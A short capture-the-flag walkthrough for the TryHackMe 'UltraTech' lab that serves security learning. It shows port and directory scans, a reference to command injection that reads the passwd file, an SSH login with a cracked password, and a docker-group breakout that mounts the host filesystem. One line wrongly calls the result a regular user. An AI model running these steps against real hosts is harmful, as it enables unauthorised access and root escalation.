UltraTech

Room Link: https://tryhackme.com/room/ultratech1

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/8081 - HTTP

Kali

gobuster dir -u http://$VICTIM:8081 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

TCP/31331 - HTTP

Kali

gobuster dir -u http://$VICTIM:31331 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

Command Injection Payload: https://github.com/payloadbox/command-injection-payload-list

We can see two intresting users in passwd file

TCP/22 - SSH

Kali

ssh r00t@$VICTIM
Password: n100906

Privilege Escalation

Exploit: https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation

We can see our user is in the docker group so we were able to break out and become a regular user.

Victim

groups

Victim

find / -name docker.sock 2>/dev/null

Victim

docker images

Victim

docker run -it -v /:/host/ bash chroot /host/ bash